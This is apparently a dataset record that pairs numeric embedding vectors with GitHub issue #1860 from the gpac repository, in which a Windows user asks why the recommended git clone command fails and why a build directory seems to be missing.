-0.014722461812198162, -0.024894345551729202, 0.0001419854670530185, 0.004053960088640451, 0.017089325934648514, -0.015539593994617462, 0.029219508171081543, 0.0061038341373205185, -0.011932943016290665, -0.02223162166774273, -0.005328967701643705, -0.00769935455173254, 0.022569745779037476, -0.0038778542075306177, 0.00008321008499478921, 0.005621303804218769, -0.005409976467490196, -0.012581013143062592, -0.010333900339901447, 0.0054170205257833, -0.00006273776671150699, 0.0006634793826378882, -0.013686958700418472, -0.004223022144287825, 0.015046496875584126, 0.009826715104281902, 0.0002720837655942887, 0.0035908014979213476, 0.006505355704575777, 0.014299807138741016, 0.01759651117026806, -0.00356790772639215, -0.00027648641844280064, -0.024640752002596855, 0.007438717409968376, -0.0070477621629834175, 0.0142716309055686, 0.011165120638906956, -0.02907862327992916, -0.005452241748571396, 0.005719922948628664, 0.015412797220051289, 0.013081153854727745, -0.00959425512701273, -0.006667373236268759, -0.007171036675572395, -0.0068012140691280365, 0.007283744402229786, 0.01786419376730919, -0.020710065960884094, 0.010009865276515484, -0.017723308876156807, 0.011573686264455318, -0.004923923872411251, 0.02624683827161789, 0.010890395380556583, -0.0031928017269819975, 0.0059453388676047325, 0.016821645200252533, 0.004377995152026415, 0.007945902645587921, 0.01839955523610115, 0.017610600218176842, -0.0010610386962071061, -0.003930686041712761, 0.013200906105339527, 0.023217815905809402, 0.007974079810082912, 0.00875599030405283, 0.011298961006104946, -0.021470844745635986, 0.04564667493104935, -0.0021942807361483574, 0.0009324813145212829, 0.007600734941661358, 0.009537900798022747, -0.022442949935793877, 0.002586997114121914, 0.0134967640042305, -0.029416747391223907, 0.016934353858232498, 0.008319247514009476, 0.00864328257739544, -0.013947595842182636, -0.006438435520976782, 0.008720769546926022, 0.020724155008792877, 0.022034382447600365, 0.012179491110146046, 0.01765286549925804, -0.007650044746696949, 0.018681325018405914, -0.0016791707603260875, -0.002298183273524046, 0.004617499187588692, -0.006427869200706482, -0.01352494116872549, 0.00964356493204832, 0.013841931708157063, 0.014792904257774353, 0.006290506571531296, -0.007209779694676399, 0.003011412685737014, 0.009995777159929276, -0.0027613420970737934, 0.03296704217791557, 0.007445761933922768, -0.012693720869719982, 0.018765855580568314, 0.0002969587512779981, 0.007551425602287054, -0.005001410376280546, 0.014032126404345036, 0.006575798150151968, 0.018061431124806404, -0.029050447046756744, -0.011911810375750065, 0.0026750501710921526, 0.006878700572997332, 0.022090736776590347, 0.016779379919171333, -0.0028124128002673388, 0.0006502714240923524, -0.010812908411026001, -0.007185124792158604, -0.015962248668074608, -0.013200906105339527, 0.019118066877126694, 0.023260081186890602, 0.008122009225189686, 0.004585800226777792, -0.0013278392143547535, 0.0336996465921402, 0.020484650507569313 ]
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
I'm building MP4Box Only on Windows and having some trouble with the git clone. As a git noob I was unable to use the command `git clone https://github.com/gpac/gpac gpac_public` as recommended as it failed in Visual Studio 2019 and at the command line. I suspect this is to do with the space before gpac_public, but not sure how to deal with it. What does it mean? I was able to clone with the url [https://github.com/gpac/gpac.git](url), but the build directory was not cloned with it. What am I doing wrong? Sorry for the noob question I was able to build the solution very effectively by downloading the master branch, but this is not ideal from a maintenance perspective Thanks
Unable to clone gpac_public
https://api.github.com/repos/gpac/gpac/issues/1860/comments
2
2021-07-18T09:26:40
2021-07-18T23:12:03Z
https://github.com/gpac/gpac/issues/1860
946,992,509
1,860
false
This is a GitHub Issue repo:gpac owner:gpac Title : Unable to clone gpac_public Issue date: --- start body --- I'm building MP4Box Only on Windows and having some trouble with the git clone. As a git noob I was unable to use the command `git clone https://github.com/gpac/gpac gpac_public` as recommended as it failed in Visual Studio 2019 and at the command line. I suspect this is to do with the space before gpac_public, but not sure how to deal with it. What does it mean? I was able to clone with the url [https://github.com/gpac/gpac.git](url), but the build directory was not cloned with it. What am I doing wrong? Sorry for the noob question I was able to build the solution very effectively by downloading the master branch, but this is not ideal from a maintenance perspective Thanks --- end body ---
826
[ -0.007636686787009239, 0.04184678941965103, -0.012166566215455532, -0.001607120968401432, 0.009665622375905514, -0.02516443282365799, -0.004515789914876223, 0.06238975748419762, -0.020500699058175087, -0.010475787334144115, 0.022585993632674217, -0.02585483342409134, 0.020021645352244377, -0.035027313977479935, -0.021444717422127724, 0.03925425931811333, -0.006963897496461868, 0.008045291528105736, -0.02078249678015709, -0.01911989599466324, 0.04562286287546158, -0.01525928359478712, -0.03178665041923523, -0.0005710783298127353, -0.012363824062049389, 0.003719714470207691, -0.019627129659056664, 0.03344925120472908, -0.01666826568543911, -0.013589639216661453, 0.015146564692258835, 0.007791674695909023, 0.02724972739815712, 0.026376157999038696, 0.05771193653345108, 0.00754510285332799, -0.0008031202014535666, 0.028672799468040466, -0.028024667873978615, -0.018034979701042175, -0.0215856172144413, -0.03429464250802994, -0.011504344642162323, -0.012701979838311672, -0.014850678853690624, 0.00022290548076853156, -0.0026330365799367428, 0.01997937634587288, -0.007686001248657703, -0.017443206161260605, 0.007006166968494654, 0.0028197267092764378, -0.01827450655400753, -0.02847554162144661, -0.018457675352692604, -0.010743494145572186, 0.012462452985346317, -0.019415782764554024, -0.020810676738619804, 0.02003573440015316, -0.0009968553204089403, 0.013716447167098522, -0.0035858612973243, 0.020218903198838234, 0.015949685126543045, 0.06182616576552391, 0.011095739901065826, 0.03350561112165451, 0.015780607238411903, 0.010356023907661438, 0.03621085733175278, -0.010419427417218685, 0.022966420277953148, 0.014540702104568481, 0.030631285160779953, -0.07755041122436523, 0.02992679364979267, -0.02981407567858696, -0.032772939652204514, 0.026531146839261055, -0.048384469002485275, -0.010053092613816261, -0.03981785476207733, -0.019415782764554024, -0.021148832514882088, 0.008594795130193233, -0.022853700444102287, -0.049934349954128265, -0.042015865445137024, -0.007714180741459131, 0.014752049930393696, 0.04931439831852913, 0.018612662330269814, -0.030152231454849243, 0.03931061923503876, 0.021656066179275513, 0.002881369786337018, 0.0013667133171111345, -0.027291996404528618, -0.04210040718317032, 0.008876591920852661, -0.004325577057898045, -0.018612662330269814, -0.020867034792900085, -0.0021997743751853704, -0.012392004020512104, 0.07056185603141785, -0.011842500418424606, 0.02751743420958519, 0.08363721519708633, 0.0002509750484023243, 0.003962764050811529, 0.027700601145625114, -0.002587244613096118, 0.0038183433935046196, 0.02720745839178562, -0.013617818243801594, -0.022740982472896576, 0.000016511517969775014, 0.016118763014674187, 0.023924527689814568, 0.00879205297678709, -0.05204782262444496, -0.03018041141331196, -0.02987043559551239, 0.013984153978526592, -0.01602013409137726, -0.005593661684542894, -0.02623526006937027, 0.002597812097519636, -0.04119865596294403, 0.003297019749879837, 0.0012214119778946042, 0.0033445728477090597, -0.014110962860286236, -0.014681600965559483, 0.003534785471856594, 0.012377914041280746, -0.018570393323898315, 0.012349734082818031, -0.06836384534835815, -0.03925425931811333, 0.028560081496834755, 0.006752550136297941, 0.012793563306331635, -0.008968175388872623, -0.01327966246753931, -0.0004174111527390778, -0.030546747148036957, 0.009116118773818016, -0.014329355210065842, -0.005572527181357145, 0.014554792083799839, 0.022571904584765434, 0.0641932561993599, -0.0028373391833156347, 0.0026277529541403055, -0.022078759968280792, -0.010905526578426361, -0.022431006655097008, 0.0004526357224676758, -0.01461115200072527, 0.028447363525629044, 0.015231103636324406, -0.0066363089717924595, 0.0014899993548169732, 0.01490703783929348, 0.015935596078634262, -0.016231480985879898, 0.005709902849048376, -0.0036844899877905846, 0.030659465119242668, 0.006312242709100246, 0.04458021745085716, -0.020613418892025948, -0.030011333525180817, 0.014153231866657734, 0.041536811739206314, 0.004480565432459116, -0.02120519056916237, -0.01290628220885992, 0.03387194499373436, 0.0005578691489063203, -0.014752049930393696, 0.032406605780124664, 0.011919994838535786, 0.010461697354912758, 0.004332622047513723, 0.025037623941898346, -0.03666173294186592, 0.0192326158285141, -0.020317532122135162, 0.037422582507133484, -0.0018422449938952923, 0.04257946088910103, 0.02195195108652115, -0.017386848106980324, 0.006139642558991909, 0.01535791251808405, 0.0030451640486717224, 0.010518056340515614, 0.013427605852484703, -0.0029482964891940355, 0.0205711480230093, -0.022261928766965866, 0.020232992246747017, -0.027010200545191765, 0.05647202953696251, 0.011236637830734253, -0.033364713191986084, -0.023952707648277283, -0.010743494145572186, -0.011905904859304428, -0.02447403036057949, 0.004660210572183132, -0.003022268181666732, -0.01571015827357769, -0.020345712080597878, -0.038437049835920334, 0.0029236392583698034, -0.028940506279468536, -0.010947796516120434, 0.03798617795109749, 0.0024798098020255566, -0.06656035035848618, 0.0035224570892751217, -0.01816178858280182, -0.004709525033831596, -0.04708820581436157, 0.00014365020615514368, -0.0006917224964126945, 0.004420683719217777, 0.014336399734020233, 0.016316020861268044, 0.010046047158539295, -0.011990443803369999, -0.007678956259042025, 0.00559718394652009, -0.04305851459503174, 0.01098302099853754, 0.004297397565096617, 0.05576753988862038, -0.027221547439694405, -0.02757379412651062, 0.021994221955537796, 0.016654176637530327, -0.007122408133000135, -0.005389359313994646, -0.013117630034685135, -0.027320176362991333, 0.003624608274549246, 0.011765005998313427, 0.0023829422425478697, 0.0024304953403770924, 0.007974842563271523, 0.019007178023457527, -0.0009422572329640388, -0.020472519099712372, 0.04086050018668175, -0.01666826568543911, -0.006977987475693226, 0.010665999725461006, -0.03220934793353081, 0.0036950574722141027, 0.0398460328578949, -0.03463279828429222, -0.027926038950681686, 0.006104418076574802, 0.04452385753393173, 0.0006221539806574583, 0.010694179683923721, -0.026460696011781693, -0.02975771576166153, -0.010884392075240612, -0.011736826971173286, 0.0036281307693570852, 0.037591662257909775, -0.004878602921962738, 0.009214747697114944, -0.00870751403272152, 0.03787345811724663, 0.013047181069850922, -0.021177010610699654, 0.014110962860286236, -0.014780229888856411, -0.00817914493381977, -0.010116496123373508, -0.010299663990736008, -0.015386092476546764, 0.07050549983978271, -0.0019250226905569434, 0.017231859266757965, -0.00590363796800375, 0.04339667037129402, -0.007932573556900024, 0.00017656316049396992, -0.0035876224283128977, 0.015047936700284481, 0.003740849206224084, 0.02051478996872902, -0.02939138188958168, 0.027855589985847473, -0.002937729237601161, -0.0161892119795084, -0.011039379984140396, 0.01842949539422989, -0.005540824960917234, 0.015935596078634262, -0.02586892433464527, -0.0020465475972741842, 0.06176980584859848, -0.019303064793348312, -0.041762251406908035, 0.0012566365767270327, -0.01997937634587288, 0.021627886220812798, 0.04334031045436859, -0.011455030180513859, -0.0586700439453125, -0.004054347984492779, -0.0031420316081494093, -0.008228459395468235, -0.044326599687337875, -0.03088490292429924, 0.03364650905132294, 0.008608885109424591, -0.05077974125742912, 0.0034167831763625145, -0.03511185199022293, -0.01517474465072155, 0.021994221955537796, 0.0035858612973243, 0.03990239277482033, -0.05734559893608093, 0.02650296688079834, -0.03623903915286064, 0.0069885547272861, -0.005512645002454519, 0.06374238431453705, -0.023487742990255356, -0.009475409053266048, 0.005209713708609343, 0.0058296662755310535, -0.030039513483643532, 0.009031579829752445, -0.01938760280609131, 0.011053469963371754, -0.007594417314976454, 0.019204435870051384, -0.005396404303610325, 0.0008955847006291151, 0.02987043559551239, -0.022571904584765434, -0.03590088337659836, 0.005713425111025572, -0.006174867041409016, 0.0010567371500656009, -0.05979723110795021, 0.03823979198932648, 0.0077634952031075954, 0.019739849492907524, -0.0667857825756073, -0.006731415167450905, 0.017781361937522888, 0.006534157786518335, 0.024023156613111496, -0.02768651209771633, -0.015188834629952908, -0.006875835824757814, -0.020078005269169807, -0.005734560079872608, 0.012525857426226139, -0.03922608122229576, 0.008411627262830734, -0.0252771507948637, -0.0019038879545405507, 0.00023798599431756884, 0.013991199433803558, -0.01354736927896738, -0.004603851120918989, -0.007974842563271523, 0.023375025019049644, 0.013716447167098522, -0.0299831535667181, 0.01071531418710947, -0.005343567114323378, -0.03387194499373436, 0.047426361590623856, -0.03209662809967995, -0.0303494893014431, -0.028602350503206253, 0.01810542866587639, -0.0013526234542950988, -0.0074676088988780975, -0.039451517164707184, 0.016640087589621544, -0.028884146362543106, -0.027531523257493973, -0.01913398690521717, -0.005931817460805178, 0.01656963676214218, -0.015625618398189545, -0.015836967155337334, 0.005706380121409893, 0.0014882381074130535, -0.0030821498949080706, 0.007925528101623058, 0.004660210572183132, -0.0002452510816510767, 0.029560459777712822, -0.014892947860062122, 0.014780229888856411, 0.017231859266757965, 0.025558948516845703, 0.047370001673698425, -0.006019879132509232, -0.0049455296248197556, 0.03189937025308609, -0.021768784150481224, 0.036041781306266785, -0.011828410439193249, -0.003899359842762351, 0.007298531010746956, 0.006456663832068443, 0.020486610010266304, 0.029842255637049675, -0.0021927293855696917, 0.03046220727264881, 0.021444717422127724, -0.023417294025421143, 0.006886403542011976, -0.02617890015244484, 0.002574915997684002, 0.015569259412586689, -0.036520835012197495, -0.013695312663912773, -0.019049447029829025, -0.03668991103768349, 0.00381482089869678, 0.0015578066231682897, -0.03421010076999664, 0.03621085733175278, 0.0033199156168848276, -0.030011333525180817, -0.003369230078533292, -0.017485477030277252, -0.0594027154147625, 0.022628264501690865, 0.03685899078845978, -0.02453039027750492, 0.0055619594641029835, 0.015935596078634262, -0.00865115411579609, 0.012709024362266064, -0.028884146362543106, 0.002393509494140744, -0.012384958565235138, 0.019796207547187805, -0.03536546975374222, 0.00041829177644103765, 0.010151720605790615, -0.021627886220812798, 0.026686133816838264, 0.03815525397658348, 0.044692933559417725, 0.01461115200072527, 0.02468537911772728, -0.028447363525629044, 0.00426217308267951, -0.01408278290182352, 0.006932195276021957, 0.027827410027384758, 0.03260386362671852, 0.02500944398343563, -0.021036112681031227, 0.01800679974257946, -0.0022719847038388252, -0.028517812490463257, 0.007559192832559347, -0.03761984035372734, -0.035506367683410645, -0.02105020359158516, 0.0040473029948771, 0.009531768970191479, -0.02981407567858696, -0.018880369141697884, -0.018978998064994812, -0.01752774603664875, 0.007622596807777882, 0.019148075953125954, 0.027376536279916763, 0.04193132743239403, -0.020542969927191734, -0.027277907356619835, 0.014822498895227909, -0.022247837856411934, -0.013850300572812557, 0.015555170364677906, 0.03823979198932648, -0.00865115411579609, 0.035450007766485214, 0.006741982884705067, -0.009531768970191479, -0.000627877947408706, 0.058106452226638794, -0.016978243365883827, -0.012561081908643246, 0.023896347731351852, -0.01934533379971981, 0.01151843462139368, -0.01735866814851761, 0.008573660627007484, -0.026038002222776413, -0.042551279067993164, -0.017781361937522888, 0.007714180741459131, -0.019796207547187805, 0.024009067565202713, 0.03370286896824837, 0.024459941312670708, -0.02569984644651413, -0.014174367301166058, -0.010391248390078545, 0.03567544370889664, -0.002643604064360261, -0.0004755317058879882, -0.016231480985879898, -0.007643731776624918, 0.0161892119795084, -0.004515789914876223, -0.011546613648533821, -0.0020535923540592194, -0.027334265410900116, 0.005227325949817896, -0.002597812097519636, -0.009285196661949158, 0.02602391131222248, -0.015005666762590408, -0.008883636444807053, 0.017386848106980324, -0.02927866205573082, 0.027052469551563263, -0.0351400300860405, 0.023600460961461067, -0.0057486495934426785, -0.00399446627125144, 0.009137253277003765, 0.010010822676122189, 0.011095739901065826, 0.022966420277953148, -0.010130586102604866, -0.022684622555971146, -0.002400554483756423, 0.03733804449439049, -0.001401937915943563, -0.03595723956823349, 0.03215298801660538, 0.02879960834980011, 0.015893325209617615, 0.0025942896027117968, 0.007939618080854416, 0.017161410301923752, 0.005181534215807915, -0.020740225911140442, -0.022078759968280792, -0.015005666762590408, 0.01378689706325531, 0.0079114381223917, -0.036577194929122925, -0.0006331616314128041, -0.006808909121900797, -0.01164524257183075, 0.02148698829114437, 0.053456805646419525, -0.01463933102786541, -0.009257016703486443, 0.02644660696387291, -0.0010215125512331724, -0.02019072324037552, -0.006791296880692244, 0.029588637873530388, -0.008165054954588413, -0.0017119140829890966, 0.01089848205447197, 0.037535302340984344, 0.007749405223876238, 0.004008556250482798, -0.00762964179739356, -0.03826797381043434, 0.005294252652674913, -0.002242043847218156, 0.01741502806544304, 0.0027140530291944742, -0.014364579692482948, 0.033533789217472076, -0.003776073921471834, 0.011983398348093033, 0.03483005613088608, 0.0299831535667181, 0.003066298784688115, -0.012730159796774387, 0.014977486804127693, 0.018936729058623314, -0.008348222821950912, -0.023530011996626854, -0.012363824062049389, 0.010905526578426361, -0.020867034792900085, -0.02751743420958519, 0.02506580390036106, -0.0378170982003212, 0.036098137497901917, 0.032406605780124664, -0.010384202934801579, 0.03421010076999664, 0.0330265574157238, 0.011849544942378998, 0.03204026818275452, -0.006217136513441801, 0.015315642580389977, -0.0033762750681489706, 0.005875458475202322, 0.026488875970244408, -0.035816341638565063, -0.015076115727424622, 0.03232206404209137, 0.023487742990255356, -0.0009880491998046637, -0.015019756741821766, 0.009623352438211441, -0.019429871812462807, 0.027559703215956688, -0.013808031566441059, -0.014420938678085804, -0.06154436990618706, 0.027320176362991333, 0.024727648124098778, 0.01656963676214218, -0.04035326838493347, 0.007559192832559347, -0.002446346450597048, -0.020754316821694374, -0.025981642305850983, 0.04824357107281685, -0.01296264212578535, -0.015160654671490192, 0.003680967492982745, 0.010081271640956402, 0.026432517915964127, 0.0072562615387141705, -0.02405133657157421, -0.0003656750777736306, -0.010743494145572186, 0.008968175388872623, 0.017062781378626823, 0.005255505908280611, -0.023980887606739998, 0.026263440027832985, 0.01869720220565796, 0.013498054817318916, -0.01499157678335905, -0.004716570023447275, -0.0185844823718071, -0.009334511123597622, 0.008594795130193233, 0.00468839006498456, -0.007164677605032921, 0.01944396272301674, -0.021895593032240868, 0.051906924694776535, 0.018034979701042175, -0.010701224207878113, 0.002511511789634824, 0.013420561328530312, -0.017767272889614105, 0.00381482089869678, 0.010412382893264294, -0.0036140407901257277, -0.008136875927448273, -0.013554414734244347, -0.006780729629099369, 0.000031729632610222325, -0.008235504850745201, -0.025093983858823776, -0.02045843005180359, 0.011941129341721535, 0.004649643320590258, -0.02382589876651764, -0.03142031654715538, -0.032462961971759796, 0.006192479282617569, -0.006174867041409016, 0.0006071834941394627, 0.021726515144109726, -0.01071531418710947, 0.012680845335125923, 0.020261172205209732, -0.017753183841705322, 0.006710280664265156, -0.0006269973237067461, 0.007062526419758797, 0.009588127955794334, -0.008270729333162308, -0.007474653888493776, -0.017964530736207962, 0.001888036960735917, 0.0019937106408178806, 0.014512523077428341, -0.007446473930031061, 0.026953840628266335, 0.0033886036835610867, 0.015512900426983833, 0.010588505305349827, 0.0016934211598709226, -0.026052091270685196, -0.01902126707136631, -0.024910815060138702, -0.021022023633122444, 0.019091716036200523, 0.015851056203246117, -0.020261172205209732, -0.005269595421850681, -0.01392074953764677, -0.03778892010450363, -0.038606129586696625, 0.020867034792900085, 0.016048314049839973, -0.0028989820275455713, -0.007742360234260559, 0.00023116123338695616, -0.030124051496386528, -0.03361833095550537, 0.0438193641602993, -0.0025379301514476538, 0.014167321845889091, -0.009073848836123943, -0.0013561459491029382, 0.0031596438493579626, 0.020965663716197014, 0.02870097942650318, -0.0141602773219347, 0.013645998202264309, -0.010243305005133152, -0.024868546053767204, 0.007819854654371738, -0.0073901149444282055, -0.00772122573107481, 0.006146687548607588, -0.003444962901994586, 0.000461001560324803, 0.020923394709825516, 0.011877724900841713, 0.007819854654371738, -0.01880992017686367, 0.007066048681735992, -0.010518056340515614, 0.016978243365883827, 0.013970063999295235, 0.009623352438211441, 0.0005001889076083899, -0.006664488464593887, -0.01143389567732811, 0.00045615818817168474, -0.01607649400830269, -0.002099384320899844, -0.020120274275541306, -0.0025396915152668953, 0.0020835332106798887, 0.03392830491065979, -0.02152925729751587, -0.036887168884277344, 0.016414649784564972, -0.02116292156279087, -0.0079114381223917, 0.01282174326479435, 0.0012945029884576797, 0.0019267839379608631, 0.007249216549098492, -0.027587883174419403, -0.019514411687850952, -0.02575620636343956, -0.01408278290182352, -0.01869720220565796, 0.026996109634637833, 0.01445616316050291, -0.007376024965196848, 0.012046802788972855, -0.02196604199707508, 0.0005948549369350076, 0.018020890653133392, -0.019894836470484734, 0.006266450975090265, 0.015343822538852692, -0.019274884834885597, 0.04133955389261246, -0.006682100705802441, 0.011342311277985573, 0.00008916218939702958, 0.018514033406972885, 0.011018245480954647, 0.001031199237331748, -0.019852567464113235, -0.026376157999038696, -0.026742493733763695, -0.03936697915196419, -0.03370286896824837, 0.008679334074258804, 0.012406093068420887, -0.033308353275060654, 0.02612254023551941, -0.019782118499279022, 0.026545235887169838, -0.01362486369907856, 0.006118507590144873, 0.03206845000386238, -0.011032335460186005, -0.001447729766368866, -0.047905415296554565, 0.00038504856638610363, 0.03319563344120979, -0.02405133657157421, -0.0035735326819121838, 0.041283197700977325, -0.042184945195913315, -0.001318279537372291, -0.01271606981754303, 0.003053970169275999, 0.0047553167678415775, 0.017908170819282532, 0.002816204447299242, 0.011440940201282501, -0.006777207367122173, -0.030124051496386528, -0.0000750723629607819, -0.01125072780996561, 0.007650776766240597, -0.019415782764554024, -0.0039803762920200825, -0.020162543281912804, 0.02533351071178913, -0.031871192157268524, -0.025713935494422913, -0.026488875970244408, -0.04604555666446686, -0.03392830491065979, -0.010940751060843468, 0.014272995293140411, -0.008186190389096737, 0.009496544487774372, 0.01955668069422245, -0.004917350132018328, 0.017598195001482964, -0.012455407530069351, 0.006537680048495531, -0.0056746783666312695, 0.018725382164120674, 0.00881318747997284, 0.009355645626783371, -0.0007533655152656138, -0.008658199571073055, 0.03429464250802994, 0.0032318541780114174, 0.005255505908280611, -0.0025837221182882786, 0.0007700971327722073, 0.00003582999124773778, -0.00495609687641263, -0.010778718627989292, 0.015780607238411903, -0.012997866608202457, -0.033421073108911514, -0.03888792544603348, -0.02383998967707157, 0.02238873578608036, 0.007995977066457272, 0.026897480711340904, -0.008059381507337093, -0.004927917383611202, -0.01628784090280533, -0.011285952292382717, 0.010412382893264294, 0.017725003883242607, -0.01370235811918974, -0.01100415550172329, -0.012511767446994781, -0.041001398116350174, 0.012920372188091278, -0.031166698783636093, -0.013674178160727024, 0.007693046238273382, 0.006322810426354408, -0.0010805136989802122, -0.0165132787078619, 0.0048116762191057205, -0.008855456486344337, 0.02970135770738125, -0.008742738515138626, -0.026700224727392197, -0.011610018089413643, -0.01816178858280182, -0.015498810447752476, 0.010264439508318901, -0.00367392273619771, -0.0212192814797163, 0.01201862283051014, 0.012849923223257065, -0.005776829551905394, -0.004152976907789707, -0.005487987771630287, 0.05776829272508621, 0.01333602238446474, 0.03226570412516594, -0.014568882063031197, -0.006058625876903534, -0.029419559985399246, 0.014540702104568481, -0.005114607512950897, -0.0007309098145924509, 0.02720745839178562, 0.017076872289180756, -0.015400181524455547, 0.01603422500193119, -0.015372002497315407, 0.030011333525180817, -0.011617063544690609, -0.004255128093063831, 0.03412556275725365, 0.014110962860286236, 0.02168424427509308, -0.0036915349774062634, 0.021656066179275513, 0.0001875708403531462, -0.01859857328236103, 0.017006421461701393, 0.013124674558639526, -0.019317153841257095, 0.02665795385837555, -0.04841264709830284, -0.016978243365883827, -0.046186454594135284, 0.013596683740615845, -0.01226519513875246, 0.005392881575971842, -0.004949051886796951, 0.014949307776987553, 0.024755828082561493, -0.009602217935025692, 0.005790919065475464, 0.0023582850117236376, -0.03615449741482735, -0.004258650355041027, -0.019190344959497452, -0.009954463690519333, 0.0070907059125602245, 0.002522079274058342, 0.03316745534539223, -0.01571015827357769, -0.008143920451402664, -0.020557058975100517, 0.011081649921834469, 0.0005288088577799499, 0.030321309342980385, 0.002930684247985482, -0.023262305185198784, 0.01472386997193098, -0.002798591973260045, 0.0034660976380109787, 0.0038958373479545116, 0.03821161389350891, -0.024558570235967636, 0.01544245146214962, -0.014737959951162338, -0.012462452985346317, 0.028123296797275543, -0.0046355533413589, -0.003969809040427208, -0.01461115200072527, 0.0168796144425869, -0.030856722965836525, 0.007812809199094772, -0.00865115411579609, -0.010348978452384472, 0.035027313977479935, 0.00754510285332799, -0.006118507590144873, -0.039451517164707184, 0.010236259549856186, 0.011680467054247856, -0.0014767900574952364, 0.015076115727424622, 0.0016361812595278025, 0.0013852062402293086, 0.019458051770925522, -0.0165132787078619, 0.0492580384016037, -0.002529124030843377, 0.019993465393781662, -0.028095116838812828, -0.03119487874209881, -0.05889547988772392, -0.03832433372735977, 0.002893698401749134, 0.006308720447123051, -0.034491900354623795, -0.016499187797307968, 0.01301195565611124, 0.030603107064962387, 0.017020512372255325, -0.036887168884277344, 0.017119141295552254, -0.019796207547187805, -0.02393861673772335, -0.00627701822668314, -0.018020890653133392, -0.015104295685887337, 0.011159143410623074, -0.026911571621894836, -0.011610018089413643, 0.018133608624339104, 0.013899615034461021, -0.01586514711380005, -0.03471733629703522, 0.009235882200300694, 0.010750538669526577, 0.00654472503811121, 0.02500944398343563, -0.03559090569615364, 0.01864084228873253, 0.032519321888685226, 0.029081404209136963, -0.009031579829752445, -0.015287463553249836, 0.004505222663283348, -0.0013394142733886838, 0.00255025876685977, -0.028729159384965897, 0.010158766061067581, -0.011342311277985573, -0.006044536363333464, 0.012131341733038425, 0.04232584312558174, 0.015893325209617615, -0.031392138451337814, -0.026319798082113266, -0.005924772471189499, 0.01544245146214962, 0.029025046154856682, 0.012568126432597637, -0.0004242359136696905, -0.031927548348903656, 0.03136395663022995, 0.010024912655353546, 0.04680640995502472, -0.03483005613088608, 0.012737204320728779, -0.029644997790455818, -0.011229593306779861, 0.01207498274743557, 0.00961630791425705, 0.01079280860722065, -0.007925528101623058, -0.031279418617486954, 0.020387981086969376, -0.011264817789196968, -0.020430250093340874, -0.005040635820478201, -0.0011853068135678768, 0.021402448415756226, 0.015005666762590408, 0.011483210138976574, 0.005720470100641251, 0.0011069320607930422, -0.004427728243172169, -0.007798719685524702, 0.028038756921887398, -0.000003928365003957879, 0.006896970793604851, -0.016851434484124184, -0.01865493133664131, -0.029306842014193535, -0.009066804312169552, -0.015188834629952908, 0.0017189589561894536, 0.0035118896048516035, -0.01634420081973076, 0.0036985797341912985, 0.003457291517406702, -0.02558712661266327, -0.013223303481936455, -0.01703460142016411, -0.02794012799859047, -0.008961130864918232, -0.022895971313118935, -0.01089848205447197, -0.014568882063031197, -0.013223303481936455, 0.007855079136788845, 0.07185812294483185, 0.028038756921887398, -0.01461115200072527, 0.0077846297062933445, 0.00036039139376953244, -0.014484343118965626, 0.024333132430911064, -0.0276301521807909, 0.020923394709825516, -0.00006323910929495469, 0.025023534893989563, -0.0010127064306288958, -0.014442073181271553, -0.0058085317723453045, 0.021557437255978584, -0.005928295198827982, 0.00801006704568863, 0.0035946674179285765, -0.0020571148488670588, 0.016654176637530327, -0.038662489503622055, 0.022726891562342644, -0.000019235916624893434, -0.032406605780124664, 0.014582972042262554, -0.0034608140122145414, 0.007270351052284241, -0.006974464748054743, -0.014322309754788876, -0.006925150286406279, -0.02489672601222992, -0.010024912655353546, 0.0036351755261421204, -0.001735690631903708, -0.00467430055141449, -0.02667204476892948, -0.026418427005410194, -0.015625618398189545, -0.008594795130193233, -0.001415147096849978, 0.005343567114323378, 0.007140020374208689, -0.007636686787009239, -0.01319512352347374, 0.009285196661949158, -0.027080649510025978, 0.010637819766998291, 0.01164524257183075, 0.017513656988739967, -0.012561081908643246, -0.009426094591617584, -0.0029993720818310976, -0.00021200788614805788, 0.027503343299031258, -0.008129830472171307, -0.0025925282388925552, 0.004374891519546509, 0.014258906245231628, -0.010010822676122189, -0.015132475644350052, -0.007002644706517458, -0.005125174764543772, 0.003295258618891239, -0.006949807517230511, 0.028334643691778183, 0.00772122573107481, -0.0027651286218315363, 0.006660966202616692, 0.013885525055229664, 0.006030446384102106, 0.022726891562342644, 0.014301175251603127, -0.006481321062892675, 0.003238899167627096, 0.013307842426002026, 0.03874702751636505, 0.009116118773818016, -0.008291863836348057, -0.0138362105935812, -0.003342811716720462, 0.03328017517924309, 0.0017400936922058463, 0.000979243079200387, 0.008517300710082054, -0.029109584167599678, 0.017823632806539536, 0.007284441031515598, 0.010236259549856186, -0.0040930951945483685, -0.008862501941621304, -0.0026207079645246267, 0.008911816403269768, 0.013491010293364525, -0.0005776829202659428, 0.008679334074258804, -0.011497299186885357, -0.002925400622189045, 0.004695435054600239, -0.008143920451402664, -0.03297019749879837, 0.018711291253566742, 0.014132097363471985, 0.0027616063598543406, 0.010743494145572186, -0.0067666396498680115, 0.021444717422127724, 0.013765761628746986, 0.03840887174010277, 0.004829288460314274, 0.004769406747072935, -0.0071717225946486, 0.014181411825120449, -0.008911816403269768, -0.01789408177137375, -0.03826797381043434, -0.012420183047652245, -0.002446346450597048, -0.0005503838765434921, 0.020387981086969376, -0.030603107064962387, -0.011490254662930965, -0.02340320497751236, -0.01811951957643032, -0.01726003922522068, -0.00029962899861857295, 0.008165054954588413, -0.046834588050842285, 0.007319665513932705, 0.003053970169275999, 0.0004724495520349592, 0.0006591397686861455, 0.05199146643280983, -0.004297397565096617, -0.012849923223257065, 0.024981264024972916, 0.007432384416460991, -0.017922261729836464, 0.00030072976369410753, -0.00613259756937623, 0.009686756879091263, -0.03595723956823349, 0.02841918356716633, 0.003850045381113887, 0.012631530873477459, 0.017879990860819817, 0.0031085682567209005, -0.009355645626783371, 0.0014125052839517593, 0.011624108068645, 0.007048436440527439, 0.01009536162018776, -0.025784384459257126, 0.01565379835665226, 0.027277907356619835, 0.00011558061669347808, -0.014512523077428341, -0.013850300572812557, 0.0061255525797605515, -0.008305953815579414, -0.008460941724479198, 0.015217014588415623, 0.01966940052807331, 0.016541458666324615, 0.00873569305986166, 0.013512144796550274, 0.022515544667840004, -0.007749405223876238, 0.00889772642403841, -0.022163299843668938, -0.013857346028089523, -0.010644865222275257, 0.018302686512470245, -0.003092717146500945, -0.02030344121158123, 0.0016141659580171108, -0.013047181069850922, -0.0011923516867682338, 0.01982438750565052, 0.006340422667562962, -0.008432761766016483, -0.0036386980209499598, 0.015681978315114975, 0.011898859404027462, -0.006428483873605728, 0.03218116611242294, -0.03719714656472206, 